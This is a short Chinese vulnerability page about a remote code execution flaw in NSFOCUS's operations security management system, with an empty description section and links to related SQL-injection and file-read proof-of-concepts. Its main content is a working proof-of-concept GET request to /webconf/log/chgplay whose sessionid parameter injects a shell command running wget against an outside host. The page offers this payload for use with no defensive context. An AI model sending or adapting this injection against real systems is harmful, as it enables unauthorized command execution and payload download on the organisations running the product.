绿盟运维安全管理系统 chgplay 远程代码执行漏洞

漏洞描述

PoC代码

GET /webconf/log/chgplay?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&status=charset&speed=10&sessionid=%3Bwget+http%3A%2F%2F10.11.12.24%3A8080%2FU1c2d98aa5ae03289.aF168a5a%3B HTTP/1.1
Host: 

相关漏洞推荐

• 绿盟运维安全管理系统 /webconf/log/getDBType SQL 注入漏洞
• 绿盟运维安全管理系统 getDBType SQL注入漏洞
• POC 绿盟运维安全管理系统 getDBType 存在SQL注入漏洞
• POC 绿盟运维安全管理系统 GetFile/index 接口 path 参数文件读取漏洞